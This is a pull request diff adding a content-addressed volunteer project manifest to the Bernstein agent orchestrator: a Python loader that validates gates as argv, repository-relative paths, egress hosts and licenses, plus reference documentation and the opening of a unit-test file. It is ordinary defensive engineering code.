### PR TITLE
feat(volunteer): content-addressed project manifest and loader

### DIFF
--- a/.cursor/rules/module-map.mdc
+++ b/.cursor/rules/module-map.mdc
@@ -79,6 +79,7 @@ alwaysApply: false
 | `trackers/`                 | Tracker adapter subsystem |
 | `trigger_sources/`          | Trigger source adapters - normalize raw events into TriggerEvent |
 | `tunnels/`                  | Tunnel provider abstraction and registry |
+| `volunteer/`                | Volunteer-workers substrate: opt-in project policy and its trust anchor |
 | `workflows/`                | Declarative YAML workflow manifests |
 | `worktrees/`                | Worktree inventory and garbage-collection helpers |
 

--- a/.goosehints
+++ b/.goosehints
@@ -80,6 +80,7 @@ Bernstein is a deterministic orchestrator for CLI coding agents (Claude Code, Co
 | `trackers/`                 | Tracker adapter subsystem |
 | `trigger_sources/`          | Trigger source adapters - normalize raw events into TriggerEvent |
 | `tunnels/`                  | Tunnel provider abstraction and registry |
+| `volunteer/`                | Volunteer-workers substrate: opt-in project policy and its trust anchor |
 | `workflows/`                | Declarative YAML workflow manifests |
 | `worktrees/`                | Worktree inventory and garbage-collection helpers |
 

--- a/AGENTS.md
+++ b/AGENTS.md
@@ -80,6 +80,7 @@ Bernstein is a deterministic orchestrator for CLI coding agents (Claude Code, Co
 | `trackers/`                 | Tracker adapter subsystem |
 | `trigger_sources/`          | Trigger source adapters - normalize raw events into TriggerEvent |
 | `tunnels/`                  | Tunnel provider abstraction and registry |
+| `volunteer/`                | Volunteer-workers substrate: opt-in project policy and its trust anchor |
 | `workflows/`                | Declarative YAML workflow manifests |
 | `worktrees/`                | Worktree inventory and garbage-collection helpers |
 

--- a/CLAUDE.md
+++ b/CLAUDE.md
@@ -80,6 +80,7 @@ Bernstein is a deterministic orchestrator for CLI coding agents (Claude Code, Co
 | `trackers/`                 | Tracker adapter subsystem |
 | `trigger_sources/`          | Trigger source adapters - normalize raw events into TriggerEvent |
 | `tunnels/`                  | Tunnel provider abstraction and registry |
+| `volunteer/`                | Volunteer-workers substrate: opt-in project policy and its trust anchor |
 | `workflows/`                | Declarative YAML workflow manifests |
 | `worktrees/`                | Worktree inventory and garbage-collection helpers |
 

--- a/CONVENTIONS.md
+++ b/CONVENTIONS.md
@@ -80,6 +80,7 @@ Bernstein is a deterministic orchestrator for CLI coding agents (Claude Code, Co
 | `trackers/`                 | Tracker adapter subsystem |
 | `trigger_sources/`          | Trigger source adapters - normalize raw events into TriggerEvent |
 | `tunnels/`                  | Tunnel provider abstraction and registry |
+| `volunteer/`                | Volunteer-workers substrate: opt-in project policy and its trust anchor |
 | `workflows/`                | Declarative YAML workflow manifests |
 | `worktrees/`                | Worktree inventory and garbage-collection helpers |
 

--- a/docs/reference/volunteer-manifest.md
+++ b/docs/reference/volunteer-manifest.md
@@ -1,0 +1,169 @@
+# Volunteer project manifest
+
+A public project opts into receiving volunteer work by committing one file,
+`.bernstein/volunteer.json`. The file is the project's declared policy: which
+commands a submission must pass, which paths a patch may touch, which hosts the
+sandbox may reach, and how long a task may run.
+
+Nothing else is required. There is no account to create, no service to register
+with, and no key to hand over. The file living in the project's own repository
+is what proves control of the project.
+
+## The manifest is content-addressed
+
+The manifest has a canonical digest, and that digest is the value a submission's
+receipt bundle carries as `manifest_sha256`.
+
+This is what makes a receipt mean something. A volunteer who ran their own,
+weaker gates can produce a bundle that verifies perfectly against their own key
+and proves nothing about the project's actual acceptance bar. Binding the
+receipt to the policy closes that gap: a maintainer recomputes the digest from
+the manifest at the commit the submission names, and equal digests mean the
+volunteer ran the policy this project declared. A mismatch is a refusal with no
+judgement call in it.
+
+Two properties follow, and both are load-bearing.
+
+**Formatting is not policy.** The digest covers the normalised manifest, not the
+file's bytes. Reindenting the JSON or reordering its keys does not invalidate
+outstanding receipts, because neither changes what the project declared.
+
+**Unknown fields are carried, never dropped.** A field a worker does not
+recognise is preserved verbatim and still participates in the digest. Dropping
+it would let a project add a policy-tightening field that older workers silently
+ignore while still producing a matching digest — a downgrade with a
+valid-looking receipt stapled to it. Older workers warn that they are running
+under a policy they can only partly apply, and the digest still differs from the
+manifest without the field.
+
+## Example
+
+```json
+{
+  "version": 1,
+  "license": "Apache-2.0",
+  "gates": [
+    ["uv", "run", "pytest", "-q"],
+    ["uv", "run", "ruff", "check", "."]
+  ],
+  "allowed_paths": ["src/**", "tests/**"],
+  "egress_allowlist": [],
+  "sandbox": "microvm",
+  "max_wall_clock_minutes": 30,
+  "task_label": "volunteer-ok",
+  "local_ok": true
+}
+```
+
+## Fields
+
+| Field | Type | Required | Meaning |
+|---|---|---|---|
+| `version` | integer | yes | Schema version. Only `1` is accepted today. |
+| `license` | string | yes | OSI-approved SPDX identifier, case-sensitive. |
+| `gates` | array of argv arrays | yes | Commands that must pass before a submission may be opened. At least one. |
+| `allowed_paths` | array of strings | no (default `[]`) | Repository-relative globs a patch may touch. Empty means repo-wide. |
+| `egress_allowlist` | array of strings | no (default `[]`) | Bare hostnames the sandbox may reach, on top of the package-registry set the sandbox profile defines. |
+| `sandbox` | `"microvm"` or `"container"` | yes | Minimum isolation the project accepts. |
+| `max_wall_clock_minutes` | integer 1–1440 | yes | Per-task wall-clock ceiling. A donor may set a tighter budget; no project may ask for more than a day of someone's machine. |
+| `task_label` | string ≤ 50 chars | no (default `"volunteer-ok"`) | Issue label marking a task as open to volunteers. |
+| `local_ok` | boolean | no (default `false`) | Whether tasks are generally solvable by local models. |
+
+Any other field is preserved and binds to the digest, and the loader warns that
+it does not enforce it.
+
+## Gates are argv, never shell strings
+
+A gate is an argument vector — `["uv", "run", "pytest", "-q"]`, not
+`"uv run pytest -q"`. A bare string is refused with an error naming the argv to
+use instead. Two reasons, in order of weight:
+
+1. The command originates in a repository the donor does not control. Handing
+   attacker-influenceable text to a shell is the exfiltration path this program
+   exists to close, and no quoting discipline makes it safe in general.
+2. The clean-room re-run has to execute the *same* command the original run did.
+   A shell string is re-parsed by whatever shell each side happens to have, so
+   "same string" does not imply "same execution" across two machines. An argv is
+   the command.
+
+A project whose gate is a pipeline puts the pipeline in a script and names the
+script. The script is then part of the repository — reviewable, and hashed with
+everything else.
+
+## Validation rules
+
+The loader refuses, naming the field at fault:
+
+- a `license` outside the accepted OSI set, including a case variant like
+  `apache-2.0` — SPDX identifiers are case-sensitive, and a near-miss must fail
+  loudly rather than pass as the license it resembles;
+- an empty `gates` list, a gate written as a string, an empty argv, or an
+  argument containing shell metacharacters (`| & ; < > $ \` \\` or a newline);
+- an `allowed_paths` entry that is absolute, names a drive, starts at a home
+  directory, or walks out of the repository root;
+- an `egress_allowlist` entry that is a URL, carries a path, contains a wildcard,
+  or is not lowercase — a wildcard hands back the surface the deny-all default
+  removes, and two spellings of one host would hash differently;
+- a `max_wall_clock_minutes` outside 1–1440;
+- a `sandbox` value that is not `microvm` or `container`;
+- an unsupported `version`. Unlike an unknown field, an unknown version means the
+  document's shape may have moved under fields the loader believes it
+  understands.
+
+Parsing is all-or-nothing. A manifest that fails validation produces an error,
+never a partially-populated policy — a manifest with valid gates and no valid
+sandbox would be more dangerous than no manifest at all.
+
+## Schema
+
+```json
+{
+  "$schema": "https://json-schema.org/draft/2020-12/schema",
+  "$id": "https://bernstein.dev/schemas/volunteer-manifest-v1.json",
+  "title": "Bernstein volunteer project manifest",
+  "type": "object",
+  "required": ["version", "license", "gates", "sandbox", "max_wall_clock_minutes"],
+  "additionalProperties": true,
+  "properties": {
+    "version": {"type": "integer", "enum": [1]},
+    "license": {"type": "string", "minLength": 1},
+    "gates": {
+      "type": "array",
+      "minItems": 1,
+      "items": {
+        "type": "array",
+        "minItems": 1,
+        "items": {"type": "string", "minLength": 1}
+      }
+    },
+    "allowed_paths": {"type": "array", "items": {"type": "string", "minLength": 1}},
+    "egress_allowlist": {"type": "array", "items": {"type": "string", "minLength": 1}},
+    "sandbox": {"type": "string", "enum": ["microvm", "container"]},
+    "max_wall_clock_minutes": {"type": "integer", "minimum": 1, "maximum": 1440},
+    "task_label": {"type": "string", "minLength": 1, "maxLength": 50},
+    "local_ok": {"type": "boolean"}
+  }
+}
+```
+
+`additionalProperties` is `true` on purpose: that is the forward-compatibility
+path, and unknown properties bind to the digest rather than being ignored.
+
+The schema states shape. It does not state the OSI set, the path-escape rules,
+or the host rules, because those are not expressible as a JSON Schema anyone
+would want to read — the loader is the authority on them, and the list above is
+the description of what it does.
+
+## Reading it from Python
+
+```python
+from bernstein.core.volunteer import load_manifest_from_repo
+
+manifest = load_manifest_from_repo(repo_root)
+print(manifest.digest)          # the value a receipt carries as manifest_sha256
+print([str(g) for g in manifest.gates])
+```
+
+## Source
+
+`src/bernstein/core/volunteer/manifest.py`.

--- a/mkdocs.yml
+++ b/mkdocs.yml
@@ -509,6 +509,7 @@ nav:
           - Eventing v2 (unified feed): events/grammar.md
           - .well-known manifest: protocols/well-known-manifest.md
           - SPIFFE workload identity: reference/spiffe-workload-identity.md
+          - Volunteer project manifest: reference/volunteer-manifest.md
           - MCP catalog: reference/mcp-catalog.md
           - MCP tool tiers: mcp/tool_tiers.md
       - Compatibility & limits:

--- a/src/bernstein/core/volunteer/__init__.py
+++ b/src/bernstein/core/volunteer/__init__.py
@@ -1,0 +1,42 @@
+"""Volunteer-workers substrate: opt-in project policy and its trust anchor.
+
+A project joins the volunteer program by committing one file,
+``.bernstein/volunteer.json``.  That file is the project's declared policy:
+which gates a submission must pass, which paths a patch may touch, which
+hosts the sandbox may reach, and how long a task may run.
+
+The manifest is content-addressed.  Its canonical digest is the value a
+result receipt carries as ``manifest_sha256``, so a maintainer verifying a
+volunteer's submission can prove the volunteer ran *the policy this project
+declared at that revision* rather than a policy the volunteer chose.
+"""
+
+from __future__ import annotations
+
+from bernstein.core.volunteer.manifest import (
+    OSI_APPROVED_LICENSES,
+    SUPPORTED_SCHEMA_VERSIONS,
+    VOLUNTEER_MANIFEST_PATH,
+    GateCommand,
+    UnenforcedManifestFieldWarning,
+    VolunteerManifest,
+    VolunteerManifestError,
+    canonical_manifest_bytes,
+    load_manifest,
+    load_manifest_from_repo,
+    manifest_digest,
+)
+
+__all__ = [
+    "OSI_APPROVED_LICENSES",
+    "SUPPORTED_SCHEMA_VERSIONS",
+    "VOLUNTEER_MANIFEST_PATH",
+    "GateCommand",
+    "UnenforcedManifestFieldWarning",
+    "VolunteerManifest",
+    "VolunteerManifestError",
+    "canonical_manifest_bytes",
+    "load_manifest",
+    "load_manifest_from_repo",
+    "manifest_digest",
+]

--- a/src/bernstein/core/volunteer/manifest.py
+++ b/src/bernstein/core/volunteer/manifest.py
@@ -1,0 +1,566 @@
+"""Project manifest for the volunteer-workers program (``.bernstein/volunteer.json``).
+
+A public project opts into receiving volunteer work by committing one file.
+Everything downstream reads it: discovery renders it, the sandbox profile
+enforces its egress list, the task runner enforces its ``allowed_paths``, and
+the clean-room verifier re-runs its ``gates``.
+
+Why the manifest is content-addressed
+-------------------------------------
+
+A volunteer submission arrives as an ordinary fork PR carrying a signed
+receipt bundle.  The bundle attests which gates ran and what they produced,
+but that attestation is worth nothing on its own: a volunteer who picks their
+own weaker gates can produce a receipt that verifies perfectly and proves
+nothing about the project's actual acceptance bar.
+
+So the receipt binds to the policy, not just to the run.
+:func:`manifest_digest` is the value a receipt bundle carries as
+``manifest_sha256``.  A maintainer recomputes it from the manifest at the
+commit the submission names; equal digests mean the volunteer ran the policy
+this project declared, and a mismatch is a refusal with no judgement call in
+it.  Strip the digest and the manifest degrades from a trust anchor into a
+configuration file.
+
+Two consequences follow, and both are load-bearing:
+
+*Canonical over parsed, not raw over bytes.*  The digest covers the
+normalised policy, not the file's bytes.  Reindenting the JSON or reordering
+its keys must not invalidate every outstanding receipt, because neither
+changes what the project declared.
+
+*Unknown fields are carried, never dropped.*  A field this loader does not
+recognise is preserved verbatim in :attr:`VolunteerManifest.extensions` and
+participates in the digest.  Dropping it would let a project add a
+policy-tightening field that older workers silently ignore while still
+producing a digest that matches -- a downgrade with a valid-looking receipt
+stapled to it.  Tolerating a field and ignoring it are different things; this
+loader does the first and never the second.
+
+Invariant for future schema versions
+------------------------------------
+
+Once a field ships, its normalisation may not change.  Two loaders that both
+accept a manifest must serialise it identically or the same policy would
+produce two digests.  A change to how a field is normalised is a breaking
+change and takes a new entry in :data:`SUPPORTED_SCHEMA_VERSIONS`; a purely
+additive field does not, because unknown fields already round-trip.
+
+Gates are argv, never shell strings
+-----------------------------------
+
+``gates`` entries are argument vectors (``["uv", "run", "pytest", "-q"]``),
+and a bare string is refused with an error that says so.  Two reasons, in
+order of weight:
+
+1. The command originates in a repository the donor does not control.  Handing
+   attacker-influenceable text to a shell is the exfiltration path this whole
+   program exists to close; there is no quoting discipline that makes it safe
+   in general.
+2. The clean-room re-run (#3871) must execute the *same* command the original
+   run did.  A shell string is re-parsed by whatever shell each side happens
+   to have, so "same string" does not imply "same execution" across two
+   machines.  An argv is the command.
+
+The cost is real and worth naming: a project whose gate is a pipeline has to
+put the pipeline in a script and name the script.  That is the intended
+trade -- the script is then part of the repository, reviewable and hashed
+along with everything else.
+"""
+
+from __future__ import annotations
+
+import hashlib
+import json
+import warnings
+from dataclasses import dataclass
+from pathlib import PurePosixPath
+from typing import TYPE_CHECKING, Any
+
+if TYPE_CHECKING:
+    from collections.abc import Mapping
+    from pathlib import Path
+
+#: Repository-relative location of the manifest.  A project opts in by
+#: committing this path; existence of the file in the project's own repository
+#: is what proves control of the project.
+VOLUNTEER_MANIFEST_PATH = ".bernstein/volunteer.json"
+
+#: Schema versions this loader accepts.  An unknown version is refused
+#: outright -- unlike an unknown *field*, an unknown *version* means the
+#: document's shape may have changed under fields this loader thinks it
+#: understands.
+SUPPORTED_SCHEMA_VERSIONS = frozenset({1})
+
+#: Sandbox isolation levels a project may demand as its minimum.
+SANDBOX_LEVELS = ("microvm", "container")
+
+#: Default issue label marking a task as open to volunteers.
+DEFAULT_TASK_LABEL = "volunteer-ok"
+
+#: Upper bound on a single task's wall clock, in minutes.  A donor may set a
+#: tighter budget; no project may demand more than a day of someone's machine.
+MAX_WALL_CLOCK_MINUTES = 1440
+
+#: OSI-approved SPDX identifiers the program accepts.  The program is
+#: open-source only (umbrella decision 1): public code means every input and
+#: every receipt is publicly auditable and there is no confidential codebase to
+#: leak.  The list is deliberately an allowlist of identifiers in real use
+#: rather than the full SPDX register -- an unlisted-but-legitimate license is
+#: a one-line PR with a human looking at it.
+OSI_APPROVED_LICENSES = frozenset(
+    {
+        "0BSD",
+        "AGPL-3.0-only",
+        "AGPL-3.0-or-later",
+        "Apache-2.0",
+        "Artistic-2.0",
+        "BSD-2-Clause",
+        "BSD-3-Clause",
+        "BSL-1.0",
+        "CDDL-1.0",
+        "CECILL-2.1",
+        "ECL-2.0",
+        "EPL-1.0",
+        "EPL-2.0",
+        "EUPL-1.2",
+        "GPL-2.0-only",
+        "GPL-2.0-or-later",
+        "GPL-3.0-only",
+        "GPL-3.0-or-later",
+        "ISC",
+        "LGPL-2.1-only",
+        "LGPL-2.1-or-later",
+        "LGPL-3.0-only",
+        "LGPL-3.0-or-later",
+        "MIT",
+        "MIT-0",
+        "MPL-2.0",
+        "MS-PL",
+        "NCSA",
+        "OSL-3.0",
+        "PostgreSQL",
+        "Python-2.0",
+        "Unlicense",
+        "UPL-1.0",
+        "Zlib",
+    }
+)
+
+_KNOWN_FIELDS = frozenset(
+    {
+        "version",
+        "license",
+        "gates",
+        "allowed_paths",
+        "egress_allowlist",
+        "sandbox",
+        "max_wall_clock_minutes",
+        "task_label",
+        "local_ok",
+    }
+)
+
+#: Characters that betray a shell string where an argv was required.
+_SHELL_METACHARACTERS = frozenset("|&;<>$`\\\n")
+
+
+class UnenforcedManifestFieldWarning(UserWarning):
+    """A manifest declares policy fields this build does not know about.
+
+    Not an error: unknown fields are how the schema grows without breaking
+    older workers, and they still bind to the digest.  It is a warning because
+    the donor is running under a policy their build can only partly apply.
+    """
+
+
+class VolunteerManifestError(ValueError):
+    """A manifest could not be loaded.
+
+    Carries the offending field so a caller can point at it without parsing
+    the message.  ``field`` is ``"<document>"` when the failure is the
+    document as a whole (not JSON, not an object).
+    """
+
+    def __init__(self, field: str, message: str) -> None:
+        self.field = field
+        super().__init__(f"{field}: {message}")
+
+
+@dataclass(frozen=True, slots=True)
+class GateCommand:
+    """One acceptance command the project requires, as an argument vector.
+
+    Attributes:
+        argv: Program and arguments, executed without a shell.
+    """
+
+    argv: tuple[str, ...]
+
+    def __str__(self) -> str:
+        return " ".join(self.argv)
+
+
+@dataclass(frozen=True, slots=True)
+class VolunteerManifest:
+    """A project's declared volunteer policy.
+
+    Attributes:
+        version: Schema version; one of :data:`SUPPORTED_SCHEMA_VERSIONS`.
+        license: OSI-approved SPDX identifier for the project.
+        gates: Commands that must pass before a submission may be opened.
+        allowed_paths: Repository-relative globs a patch may touch.  Empty
+            means repo-wide.
+        egress_allowlist: Hostnames the sandbox may reach on top of the
+            package-registry set the sandbox profile defines.  Empty means the
+            gates need no network beyond that set.
+        sandbox: Minimum isolation the project accepts.
+        max_wall_clock_minutes: Per-task wall-clock ceiling.
+        task_label: Issue label marking a task as open to volunteers.
+        local_ok: Whether tasks are generally solvable by local models.
+        extensions: Fields this loader did not recognise, preserved verbatim.
+            They participate in :attr:`digest`.
+    """
+
+    version: int
+    license: str
+    gates: tuple[GateCommand, ...]
+    allowed_paths: tuple[str, ...]
+    egress_allowlist: tuple[str, ...]
+    sandbox: str
+    max_wall_clock_minutes: int
+    task_label: str
+    local_ok: bool
+    extensions: Mapping[str, Any]
+
+    def to_canonical_dict(self) -> dict[str, Any]:
+        """The normalised policy, as the digest sees it.
+
+        Unknown fields are merged back at the top level under their original
+        keys, so a loader that understands a field and one that does not
+        serialise the same document.
+        """
+        payload: dict[str, Any] = {
+            "version": self.version,
+            "license": self.license,
+            "gates": [list(gate.argv) for gate in self.gates],
+            "allowed_paths": list(self.allowed_paths),
+            "egress_allowlist": list(self.egress_allowlist),
+            "sandbox": self.sandbox,
+            "max_wall_clock_minutes": self.max_wall_clock_minutes,
+            "task_label": self.task_label,
+            "local_ok": self.local_ok,
+        }
+        payload.update(self.extensions)
+        return payload
+
+    @property
+    def digest(self) -> str:
+        """SHA-256 of the canonical form, as ``manifest_sha256`` carries it."""
+        return manifest_digest(self)
+
+
+def canonical_manifest_bytes(manifest: VolunteerManifest) -> bytes:
+    """Serialise a manifest to its canonical, byte-stable form.
+
+    Matches the discipline in
+    :func:`bernstein.core.security.audit_dsse._canonical_json` -- keys sorted
+    at every depth, no insignificant whitespace -- so a digest computed here
+    is comparable with the rest of the receipt substrate.
+    """
+    return json.dumps(
+        _sort_recursive(manifest.to_canonical_dict()),
+        sort_keys=True,
+        separators=(",", ":"),
+        ensure_ascii=False,
+    ).encode("utf-8")
+
+
+def manifest_digest(manifest: VolunteerManifest) -> str:
+    """The manifest's content address: 64 lowercase hex characters."""
+    return hashlib.sha256(canonical_manifest_bytes(manifest)).hexdigest()
+
+
+def load_manifest(source: str | bytes) -> VolunteerManifest:
+    """Parse and validate a manifest document.
+
+    Parsing is all-or-nothing: either a fully-validated manifest comes back or
+    :class:`VolunteerManifestError` is raised naming the field at fault.  No
+    partially-populated object is ever produced, because a half-applied policy
+    is more dangerous than no policy.
+
+    Raises:
+        VolunteerManifestError: The document is not a JSON object, declares an
+            unsupported version, or any field fails validation.
+    """
+    text = source.decode("utf-8") if isinstance(source, bytes) else source
+    try:
+        raw = json.loads(text)
+    except (UnicodeDecodeError, json.JSONDecodeError) as exc:
+        raise VolunteerManifestError("<document>", f"not valid JSON: {exc}") from exc
+    if not isinstance(raw, dict):
+        raise VolunteerManifestError("<document>", f"expected a JSON object, got {type(raw).__name__}")
+
+    version = _load_version(raw)
+    return VolunteerManifest(
+        version=version,
+        license=_load_license(raw),
+        gates=_load_gates(raw),
+        allowed_paths=_load_allowed_paths(raw),
+        egress_allowlist=_load_egress_allowlist(raw),
+        sandbox=_load_sandbox(raw),
+        max_wall_clock_minutes=_load_wall_clock(raw),
+        task_label=_load_task_label(raw),
+        local_ok=_load_local_ok(raw),
+        extensions=_load_extensions(raw),
+    )
+
+
+def load_manifest_from_repo(repo_root: Path) -> VolunteerManifest:
+    """Load ``.bernstein/volunteer.json`` from a checked-out repository.
+
+    Raises:
+        FileNotFoundError: The project has not opted in.
+        VolunteerManifestError: The manifest exists but does not validate.
+    """
+    path = repo_root / VOLUNTEER_MANIFEST_PATH
+    if not path.is_file():
+        raise FileNotFoundError(f"{path} does not exist; the project has not opted in to volunteer work")
+    return load_manifest(path.read_bytes())
+
+
+# ---------------------------------------------------------------------------
+# Field loaders
+# ---------------------------------------------------------------------------
+
+
+def _load_version(raw: dict[str, Any]) -> int:
+    if "version" not in raw:
+        raise VolunteerManifestError("version", "required")
+    value = raw["version"]
+    # bool is an int subclass; `true` is not a schema version.
+    if not isinstance(value, int) or isinstance(value, bool):
+        raise VolunteerManifestError("version", f"expected an integer, got {type(value).__name__}")
+    if value not in SUPPORTED_SCHEMA_VERSIONS:
+        supported = ", ".join(str(v) for v in sorted(SUPPORTED_SCHEMA_VERSIONS))
+        raise VolunteerManifestError("version", f"unsupported schema version {value}; this build accepts {supported}")
+    return value
+
+
+def _load_license(raw: dict[str, Any]) -> str:
+    value = _require_str(raw, "license")
+    if value not in OSI_APPROVED_LICENSES:
+        raise VolunteerManifestError(
+            "license",
+            f"{value!r} is not in the accepted OSI-approved set; the volunteer program is open-source only",
+        )
+    return value
+
+
+def _load_gates(raw: dict[str, Any]) -> tuple[GateCommand, ...]:
+    value = raw.get("gates")
+    if not isinstance(value, list):
+        raise VolunteerManifestError("gates", f"expected a list, got {type(value).__name__}")
+    if not value:
+        raise VolunteerManifestError(
+            "gates",
+            "must name at least one command; a project with no acceptance gate cannot verify a submission",
+        )
+    gates: list[GateCommand] = []
+    for index, entry in enumerate(value):
+        gates.append(_load_gate(entry, index))
+    return tuple(gates)
+
+
+def _load_gate(entry: Any, index: int) -> GateCommand:
+    field = f"gates[{index}]"
+    if isinstance(entry, str):
+        raise VolunteerManifestError(
+            field,
+            f"expected an argv list, got a string {entry!r}; write it as "
+            f"{json.dumps(entry.split())} -- gate commands run without a shell",
+        )
+    if not isinstance(entry, list):
+        raise VolunteerManifestError(field, f"expected an argv list, got {type(entry).__name__}")
+    if not entry:
+        raise VolunteerManifestError(field, "argv is empty")
+    argv: list[str] = []
+    for position, token in enumerate(entry):
+        if not isinstance(token, str):
+            raise VolunteerManifestError(f"{field}[{position}]", f"expected a string, got {type(token).__name__}")
+        if not token:
+            raise VolunteerManifestError(f"{field}[{position}]", "empty argument")
+        offending = _SHELL_METACHARACTERS.intersection(token)
+        if offending:
+            raise VolunteerManifestError(
+                f"{field}[{position}]",
+                f"contains shell metacharacters {''.join(sorted(offending))!r}; gate commands run without a shell, "
+                "so put the pipeline in a script in the repository and name the script here",
+            )
+        argv.append(token)
+    return GateCommand(argv=tuple(argv))
+
+
+def _load_allowed_paths(raw: dict[str, Any]) -> tuple[str, ...]:
+    value = raw.get("allowed_paths", [])
+    if not isinstance(value, list):
+        raise VolunteerManifestError("allowed_paths", f"expected a list, got {type(value).__name__}")
+    paths: list[str] = []
+    for index, entry in enumerate(value):
+        field = f"allowed_paths[{index}]"
+        if not isinstance(entry, str):
+            raise VolunteerManifestError(field, f"expected a string, got {type(entry).__name__}")
+        paths.append(_validate_repo_relative(entry, field))
+    return tuple(paths)
+
+
+def _validate_repo_relative(entry: str, field: str) -> str:
+    """Refuse anything that could name a file outside the checkout."""
+    if not entry:
+        raise VolunteerManifestError(field, "empty glob")
+    if "\x00" in entry:
+        raise VolunteerManifestError(field, "contains a NUL byte")
+    normalised = entry.replace("\\", "/")
+    if normalised.startswith("/"):
+        raise VolunteerManifestError(field, f"{entry!r} is absolute; globs are relative to the repository root")
+    if len(normalised) > 1 and normalised[1] == ":":
+        raise VolunteerManifestError(field, f"{entry!r} names a drive; globs are relative to the repository root")
+    if normalised.startswith("~"):
+        raise VolunteerManifestError(field, f"{entry!r} refers to a home directory")
+    depth = 0
+    for part in PurePosixPath(normalised).parts:
+        if part == "..":
+            depth -= 1
+            if depth < 0:
+                raise VolunteerManifestError(field, f"{entry!r} escapes the repository root")
+        elif part not in (".", ""):
+            depth += 1
+    return entry
+
+
+def _load_egress_allowlist(raw: dict[str, Any]) -> tuple[str, ...]:
+    value = raw.get("egress_allowlist", [])
+    if not isinstance(value, list):
+        raise VolunteerManifestError("egress_allowlist", f"expected a list, got {type(value).__name__}")
+    hosts: list[str] = []
+    for index, entry in enumerate(value):
+        field = f"egress_allowlist[{index}]"
+        if not isinstance(entry, str):
+            raise VolunteerManifestError(field, f"expected a string, got {type(entry).__name__}")
+        hosts.append(_validate_host(entry, field))
+    return tuple(hosts)
+
+
+def _validate_host(entry: str, field: str) -> str:
+    """Accept a bare hostname only.
+
+    No scheme, no path, no wildcard.  The sandbox turns this list into deny-all
+    plus these names; a wildcard would hand back the egress surface the profile
+    exists to remove, and a URL would leave the sandbox guessing which part of
+    it was the host.
+    """
+    if not entry:
+        raise VolunteerManifestError(field, "empty host")
+    if "://" in entry:
+        raise VolunteerManifestError(field, f"{entry!r} is a URL; name the host only")
+    if "/" in entry:
+        raise VolunteerManifestError(field, f"{entry!r} contains a path; name the host only")
+    if "*" in entry:
+        raise VolunteerManifestError(
+            field,
+            f"{entry!r} is a wildcard; list each host explicitly so the deny-all default keeps its meaning",
+        )
+    if any(character.isspace() for character in entry):
+        raise VolunteerManifestError(field, f"{entry!r} contains whitespace")
+    if entry != entry.lower():
+        raise VolunteerManifestError(field, f"{entry!r} must be lowercase so two spellings cannot hash differently")
+    return entry
+
+
+def _load_sandbox(raw: dict[str, Any]) -> str:
+    value = _require_str(raw, "sandbox")
+    if value not in SANDBOX_LEVELS:
+        levels = ", ".join(SANDBOX_LEVELS)
+        raise VolunteerManifestError("sandbox", f"{value!r} is not one of: {levels}")
+    return value
+
+
+def _load_wall_clock(raw: dict[str, Any]) -> int:
+    if "max_wall_clock_minutes" not in raw:
+        raise VolunteerManifestError("max_wall_clock_minutes", "required")
+    value = raw["max_wall_clock_minutes"]
+    if not isinstance(value, int) or isinstance(value, bool):
+        raise VolunteerManifestError("max_wall_clock_minutes", f"expected an integer, got {type(value).__name__}")
+    if value < 1:
+        raise VolunteerManifestError("max_wall_clock_minutes", f"must be at least 1, got {value}")
+    if value > MAX_WALL_CLOCK_MINUTES:
+        raise VolunteerManifestError(
+            "max_wall_clock_minutes",
+            f"must be at most {MAX_WALL_CLOCK_MINUTES}, got {value}",
+        )
+    return value
+
+
+def _load_task_label(raw: dict[str, Any]) -> str:
+    value = raw.get("task_label", DEFAULT_TASK_LABEL)
+    if not isinstance(value, str):
+        raise VolunteerManifestError("task_label", f"expected a string, got {type(value).__name__}")
+    if not value:
+        raise VolunteerManifestError("task_label", "empty label")
+    if len(value) > 50:
+        raise VolunteerManifestError("task_label", f"longer than 50 characters ({len(value)})")
+    if any(character.isspace() and character != " " for character in value):
+        raise VolunteerManifestError("task_label", f"{value!r} contains a control character")
+    return value
+
+
+def _load_local_ok(raw: dict[str, Any]) -> bool:
+    value = raw.get("local_ok", False)
+    if not isinstance(value, bool):
+        raise VolunteerManifestError("local_ok", f"expected a boolean, got {type(value).__name__}")
+    return value
+
+
+def _load_extensions(raw: dict[str, Any]) -> Mapping[str, Any]:
+    """Keep fields this loader does not know, verbatim.
+
+    They round-trip into :meth:`VolunteerManifest.to_canonical_dict` and so
+    into the digest.  A project that adds a policy-tightening field gets a
+    different digest even from workers too old to enforce it, which is what
+    stops an old worker producing a receipt that looks like compliance with a
+    policy it never read.
+
+    The load also warns, because carrying a field is not enforcing it: a donor
+    whose build is older than the project's manifest is running under a policy
+    it can only partly apply, and that is worth saying out loud.
+    """
+    extensions = {key: value for key, value in sorted(raw.items()) if key not in _KNOWN_FIELDS}
+    if extensions:
+        warnings.warn(
+            f"{VOLUNTEER_MANIFEST_PATH} declares fields this build does not enforce: "
+            f"{', '.join(extensions)}. They are carried into the manifest digest, so receipts stay "
+            "comparable, but a newer worker may apply policy this one cannot.",
+            UnenforcedManifestFieldWarning,
+            stacklevel=4,
+        )
+    return extensions
+
+
+def _require_str(raw: dict[str, Any], field: str) -> str:
+    if field not in raw:
+        raise VolunteerManifestError(field, "required")
+    value = raw[field]
+    if not isinstance(value, str):
+        raise VolunteerManifestError(field, f"expected a string, got {type(value).__name__}")
+    if not value:
+        raise VolunteerManifestError(field, "empty")
+    return value
+
+
+def _sort_recursive(value: Any) -> Any:
+    """Order dict keys at every depth so serialisation is byte-stable."""
+    if isinstance(value, dict):
+        return {key: _sort_recursive(value[key]) for key in sorted(value)}
+    if isinstance(value, list):
+        return [_sort_recursive(item) for item in value]
+    return value

--- a/tests/unit/volunteer/__init__.py
+++ b/tests/unit/volunteer/__init__.py
@@ -1,0 +1,1 @@
+"""Volunteer-workers unit tests."""

--- a/tests/unit/volunteer/test_volunteer_manifest.py
+++ b/tests/unit/volunteer/test_volunteer_manifest.py
@@ -1,0 +1,487 @@
+"""The volunteer manifest is a project's declared policy and its trust anchor.
+
+Each test is named for the property it protects rather than the function it
+calls, because the interesting failures here are not "the loader crashed" --
+they are "a submission verified against a policy nobody declared".
+
+The digest tests carry most of the weight.  A receipt bundle attests
+``manifest_sha256``; if that value can be made to match while the effective
+policy differs, every downstream verification is theatre.
+"""
+
+from __future__ import annotations
+
+import json
+import re
+import warnings
+from pathlib import Path
+from typing import Any
+
+import pytest
+
+from bernstein.core.volunteer.manifest import (
+    _KNOWN_FIELDS,
+    OSI_APPROVED_LICENSES,
+    VOLUNTEER_MANIFEST_PATH,
+    GateCommand,
+    UnenforcedManifestFieldWarning,
+    VolunteerManifestError,
+    canonical_manifest_bytes,
+    load_manifest,
+    load_manifest_from_repo,
